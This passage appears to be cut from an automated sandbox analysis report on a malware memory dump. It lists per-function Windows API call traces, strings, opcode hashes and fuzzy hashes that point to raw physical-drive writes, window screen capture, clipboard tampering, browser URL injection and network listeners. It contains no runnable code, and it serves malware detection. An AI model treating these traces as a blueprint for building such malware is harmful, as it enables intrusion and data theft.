                                                                                                                                                                                                              • strstr.MSVCRT(00000000,set_url ,00000000,00000001,774CF550,774D1620,80000002), ref: 012F1A06
                                                                                                                                                                                                              • strstr.MSVCRT(-00000008,set_url ), ref: 012F1A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F1A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F1A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F1A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F1A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$#680CommandLinememset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              • API String ID: 3394688803-3242205626
                                                                                                                                                                                                              • Opcode ID: 5cdc043aadd5b121adf5292fac198254ded031345727fd3ffcda6cf7eb5872a6
                                                                                                                                                                                                              • Instruction ID: 47104b9c243278548dce87b1e99766056f865a646f6bdeca63b646de8b058e4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cdc043aadd5b121adf5292fac198254ded031345727fd3ffcda6cf7eb5872a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F310731A61362ABE7313A755C09FAFBA8C9F11B15F84403CEF45E7341EAA5C91487E1
                                                                                                                                                                                                              Function 01301460 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 81synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01301477
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 01301484
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 013014D4
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 013014F0
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 013014F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 01301509
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 0130152D
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214},00000006), ref: 0130154A
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301551
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01301563
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301574
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathAddBackslashA.SHLWAPI(61C5C387), ref: 01300F50
                                                                                                                                                                                                                • Part of subcall function 01300F20: CreateDirectoryA.KERNEL32(?,00000000), ref: 01300F91
                                                                                                                                                                                                                • Part of subcall function 01300F20: GetLastError.KERNEL32 ref: 01300F9B
                                                                                                                                                                                                                • Part of subcall function 01300F20: #680.SHELL32 ref: 01300FA3
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathMakeSystemFolderA.SHLWAPI(?), ref: 01300FB4
                                                                                                                                                                                                                • Part of subcall function 01300F20: SetLastError.KERNEL32(00000000), ref: 01300FBB
                                                                                                                                                                                                                • Part of subcall function 01300F20: SetCurrentDirectoryA.KERNEL32(?), ref: 01300FC8
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathAddBackslashA.SHLWAPI(61C5C387,?,?), ref: 01301037
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCharCreateDirectoryErrorFileHandleLastMutexNameUpper$#680CloseCurrentFindFolderInformationMakeModulePrivateProfileReleaseSleepStringSystem
                                                                                                                                                                                                              • String ID: DefaultPrivateDir$General$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw$interpro.ini
                                                                                                                                                                                                              • API String ID: 4105599095-3677208129
                                                                                                                                                                                                              • Opcode ID: a7874c7a6cb524727dc3c1c4cf8e37f76880305d9b4b2f19659ca5fd6cae0440
                                                                                                                                                                                                              • Instruction ID: 5a9729ad3840e0ff4cddecb72389ce162d4000702ee9e958e4a7affa607097ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7874c7a6cb524727dc3c1c4cf8e37f76880305d9b4b2f19659ca5fd6cae0440
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9131BD71901218ABDB31AF64DC49FDA7BBCAB54B14F148188E605AB185DBB0DA448FA0
                                                                                                                                                                                                              Function 01309910 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                              • wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                              • wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 01309B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 01309B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              • Opcode ID: 3b13ec2516094b26ce2521f6cfddc23b38ad2ff8a0ff272b6f759d4e04bd153e
                                                                                                                                                                                                              • Instruction ID: 2ead3b88b6b6942264662f381bc05c17e256414d68386f1c2c443cb7130d83b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b13ec2516094b26ce2521f6cfddc23b38ad2ff8a0ff272b6f759d4e04bd153e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A518FB16083429FD722DF58C894BABBBECBB8970CF04490DF98997286D7749548C7A1
                                                                                                                                                                                                              Function 012E2BA0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              • Opcode ID: 06c86fa7fe3e842ac988f8a1c45e79e45181766eabe3ec1ef3ab193599528e9f
                                                                                                                                                                                                              • Instruction ID: 407f239aa8fe9f908b2a2c6c973263abecbaad179fec52d5393bece92e3d5f8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06c86fa7fe3e842ac988f8a1c45e79e45181766eabe3ec1ef3ab193599528e9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F17F71A2021ADBDB20CF5CD888BAEB7E9FB48710F544128EA06A7241D771E951CBA1
                                                                                                                                                                                                              Function 012F33F0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012F3411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32 ref: 012F3428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32 ref: 012F3438
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,\\.\PhysicalDrive%u,?), ref: 012F3465
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 012F3487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F34B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000104,00000000,00000000), ref: 012F34D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F3507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F3518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              • Opcode ID: ce3244b44b26e530c687602449a5a92ba43996ea026c2f64fe00cb0a1bf6c8ae
                                                                                                                                                                                                              • Instruction ID: 14cd6c9b93d229848e82f8afbeb55bf806c30f69688e45dd59c07487f8207fb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce3244b44b26e530c687602449a5a92ba43996ea026c2f64fe00cb0a1bf6c8ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3431BC71941324BBE731AB58AC49FEABBACAB45B11F108158F744AA1C0D7F45B80CBA4
                                                                                                                                                                                                              Function 0130DAE8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 135filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0130DB7A
                                                                                                                                                                                                              • strchr.MSVCRT(Desk,0000005C,?,00000000), ref: 0130DB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 0130DC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0130DC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 23527507-2295261572
                                                                                                                                                                                                              • Opcode ID: f9da9748d393397c9578f2b6f836e3de87d7a85e91f89bd581ed8e39c4c08d38
                                                                                                                                                                                                              • Instruction ID: 3a616c0423ca44bc655f0c57709340d5922d26d1d24c1b308299703afd8ee99d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9da9748d393397c9578f2b6f836e3de87d7a85e91f89bd581ed8e39c4c08d38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A94189319006498FEF378BE8CC347FA7BE5EF42308F1442D4DA8A971C2D670AA858B51
                                                                                                                                                                                                              Function 012ED970 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                              • wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                              • wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              • API String ID: 776485234-1938657081
                                                                                                                                                                                                              • Opcode ID: b26584f38e17afaff12582f331e673e06e0d46f22e9c43930cab1dddfd07983d
                                                                                                                                                                                                              • Instruction ID: fd195af31ea25b7f3524566002cbaed0257f74a0ec253dcc6492424e02aeb83b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b26584f38e17afaff12582f331e673e06e0d46f22e9c43930cab1dddfd07983d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2401BE7229023CB5D2307E979C4BCB7766CDF8966EB61021DF98591340F9909D00CAB1
                                                                                                                                                                                                              Function 012E9530 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,?), ref: 012E953B
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012E954A
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012E9561
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 012E9569
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 012E9576
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 012E9581
                                                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 012E958A
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 012E9590
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 453615576-0
                                                                                                                                                                                                              • Opcode ID: 09ed4f4fcd1394e3e4ce63a9d5f296e1f0bf15ddcd26e8582dcf021a670c8318
                                                                                                                                                                                                              • Instruction ID: b4a59e05f39966dc7ea10c0b62a3d0846cc7887bb66090aaa610cdba9f8a6ae6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09ed4f4fcd1394e3e4ce63a9d5f296e1f0bf15ddcd26e8582dcf021a670c8318
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F06832101345AFD7307FA5AC8CFEA7BACFB59766F445019FA09C6145CBB096008770
                                                                                                                                                                                                              Function 01311250 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 01311278
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0131128E
                                                                                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 013112A8
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 013112B3
                                                                                                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 013112CB
                                                                                                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 013112D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: bindclosesockethtonslistensetsockoptsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4126956815-0
                                                                                                                                                                                                              • Opcode ID: 2c92836e9d2debbd3b0e23d37a50a1eb6ba8435de3ffef0d809a086bc7ca8737
                                                                                                                                                                                                              • Instruction ID: 3d2d814fb365130581ac8b6f8a169752710276d9913ff32cc7bb633adb14fd0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c92836e9d2debbd3b0e23d37a50a1eb6ba8435de3ffef0d809a086bc7ca8737
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11A071700209ABD720AE68DC09BEF7B6CAF05711F104219FF01EA2C4E7B09A018BA5
                                                                                                                                                                                                              Function 012F9970 Relevance: 7.6, APIs: 5, Instructions: 52networkmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F998D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F9994
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F99AF
                                                                                                                                                                                                              • send.WS2_32(?,?,00000000,00000000), ref: 012F99C0
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F99D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2415998009-0
                                                                                                                                                                                                              • Opcode ID: c016e10085c5855ffd180deb80e5a34bdaca9d71bad02750f78bf55a48a877ef
                                                                                                                                                                                                              • Instruction ID: 70dc8ffa9d1c04b46e6581c9522cb33dcff453efd9be16e89e63b67cb2bbfcdd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c016e10085c5855ffd180deb80e5a34bdaca9d71bad02750f78bf55a48a877ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2301D8B21102057BEB30AB6D9C45FEBBB6CAF45714F044069FB05E7185D674AA81C7F4
                                                                                                                                                                                                              Function 012ECD50 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000,00000000), ref: 012ECD58
                                                                                                                                                                                                              • IsIconic.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECFCE), ref: 012ECD63
                                                                                                                                                                                                                • Part of subcall function 012EC950: IsWindow.USER32(?,774D30D0,7707BCB0,774D3050), ref: 012EC96D
                                                                                                                                                                                                                • Part of subcall function 012EC950: IsWindowVisible.USER32(?), ref: 012EC97C
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetWindowRect.USER32(?,?), ref: 012EC9B9
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetClassLongA.USER32(?,000000E6), ref: 012EC9C2
                                                                                                                                                                                                                • Part of subcall function 012EC950: PrintWindow.USER32(?,?,00000000), ref: 012EC9D5
                                                                                                                                                                                                                • Part of subcall function 012EC950: RedrawWindow.USER32(?,00000000,00000000,00000485,?,?), ref: 012EC9FB
                                                                                                                                                                                                                • Part of subcall function 012EC950: CreateRectRgn.GDI32(?,?,?,?), ref: 012ECA11
                                                                                                                                                                                                                • Part of subcall function 012EC950: GetWindowRgn.USER32(?,00000000), ref: 012ECA1B
                                                                                                                                                                                                                • Part of subcall function 012EC950: OffsetRgn.GDI32(00000000,?,?), ref: 012ECA35
                                                                                                                                                                                                                • Part of subcall function 012EC950: SelectClipRgn.GDI32(?,00000000), ref: 012ECA40
                                                                                                                                                                                                                • Part of subcall function 012EC950: BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 012ECA69
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000038), ref: 012ECD8C
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetWindowRect.USER32(012ECD24,00000000,012ED21D,7707BCB0), ref: 012ECBFF
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetWindowLongA.USER32(012ECD24,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECD24), ref: 012ECC19
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetScrollBarInfo.USER32(012ECD24,000000FA,?), ref: 012ECC34
                                                                                                                                                                                                                • Part of subcall function 012ECBF0: GetScrollBarInfo.USER32(012ECD24,000000FB,0000003C), ref: 012ECC61
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005,00000001,00000000,00000000), ref: 012ECDAD
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012ECDB0
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: memset.MSVCRT(?,00000000,00000038,7707BCB0,00000000,77074A40), ref: 012ECD11
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(012ED21D,00000005,00000001,00000000,012ED21D,7707BCB0,00000000,77074A40), ref: 012ECD2C
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(00000000), ref: 012ECD2F
                                                                                                                                                                                                                • Part of subcall function 012ECCE0: GetWindow.USER32(012ED21D,00000003,?,?,?,?,?,?,?,?,?,?,?,?,012ED21D,00000000), ref: 012ECD3A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Rect$InfoLongScrollmemset$ClassClipCreateIconicOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1230479295-0
                                                                                                                                                                                                              • Opcode ID: 5af4b8376d6dbb64795c9036bd3fa01437f4179fe32a9bf29fa14a49ae09c778
                                                                                                                                                                                                              • Instruction ID: c44c8c0cbe66603d659330837a49144e9f9ba91e48dcff713f16c652a2eddfbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af4b8376d6dbb64795c9036bd3fa01437f4179fe32a9bf29fa14a49ae09c778
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF09071A6021A36EB317BB9AC4DBFF3FEC9F11B11F40000AFA04E2181EBA5542587E1
                                                                                                                                                                                                              Function 01302B40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 01302B5E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01302B83
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 01302B95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
